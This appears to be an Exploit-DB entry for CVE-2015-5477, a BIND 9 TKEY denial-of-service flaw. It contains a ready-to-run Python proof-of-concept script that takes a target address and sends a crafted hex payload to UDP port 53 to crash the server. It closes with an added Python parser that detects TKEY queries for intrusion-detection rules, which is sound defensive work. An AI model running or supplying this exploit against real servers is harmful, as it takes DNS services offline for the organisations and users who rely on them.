Vendor: BIND 9
By: elceef
CVSS: 7.5 HIGH
Denial of Service
CWE: 400
Product Name: BIND 9
Affected Version From: ISC BIND 9
Affected Version To: ISC BIND 9
Patch Exists: YES
Related CWE: CVE-2015-5477
CPE: a:isc:bind:9
Platforms Tested: multiple
2015

PoC for BIND9 TKEY DoS

This is a proof of concept for CVE-2015-5477, a denial-of-service vulnerability in ISC BIND 9. It sends a single specially crafted TKEY query to the target over UDP port 53, which causes the server to crash.

Mitigation:

Upgrade to the latest version of BIND 9, which includes a patch for this vulnerability.

Exploit-DB raw data:

#!/usr/bin/env python

# Exploit Title: PoC for BIND9 TKEY DoS
# Exploit Author: elceef
# Software Link: https://github.com/elceef/tkeypoc/
# Version: ISC BIND 9
# Tested on: multiple
# CVE : CVE-2015-5477


import socket
import sys

print('CVE-2015-5477 BIND9 TKEY PoC')

if len(sys.argv) < 2:
	print('Usage: ' + sys.argv[0] + ' [target]')
	sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) 

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))

print('Done.')
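
As an added example (not part of the Exploit-DB entry or elceef's code), the following Python 3 parser flags DNS queries whose question type is TKEY (249, the `00 f9` in the payload above), which can feed an IDS rule or log filter until servers are upgraded. Treating every TKEY query as suspicious is an assumption that fits servers which do not use TKEY; the function names and sample packets are constructed for illustration.

```python
import struct

QTYPE_TKEY = 249  # TKEY RR type (RFC 2930); the PoC's question carries 00 f9

def parse_question(pkt):
    """Return (is_query, qname, qtype, arcount) for a DNS message, or None if malformed."""
    if len(pkt) < 12:
        return None
    _id, flags, qdcount, _an, _ns, arcount = struct.unpack("!6H", pkt[:12])
    if qdcount < 1:
        return None
    labels, off = [], 12
    while True:
        if off >= len(pkt):
            return None                      # ran off the end of the packet
        length = pkt[off]
        off += 1
        if length == 0:
            break                            # root label terminates the name
        if length > 63 or off + length > len(pkt):
            return None                      # compression pointer or truncated label
        labels.append(pkt[off:off + length].decode("ascii", "replace"))
        off += length
    if off + 4 > len(pkt):
        return None
    qtype, _qclass = struct.unpack("!2H", pkt[off:off + 4])
    return (flags & 0x8000) == 0, ".".join(labels) or ".", qtype, arcount

def is_tkey_query(pkt):
    """True for a well-formed query (QR=0) whose first question asks for type TKEY."""
    parsed = parse_question(pkt)
    return bool(parsed) and parsed[0] and parsed[2] == QTYPE_TKEY

def dns_query(qname, qtype, txid=0x1234):
    """Build a constructed sample query with one question and no other records."""
    name = b"".join(bytes([len(p)]) + p.encode() for p in qname.split(".")) + b"\x00"
    return struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0) + name + struct.pack("!2H", qtype, 1)

# Constructed samples (not captured traffic): an ordinary A query and a TKEY query.
SAMPLES = {"A example.com": dns_query("example.com", 1),
           "TKEY example.com": dns_query("example.com", QTYPE_TKEY)}

if __name__ == "__main__":
    for label, pkt in SAMPLES.items():
        print(label, "->", "ALERT: TKEY query" if is_tkey_query(pkt) else "ok")
```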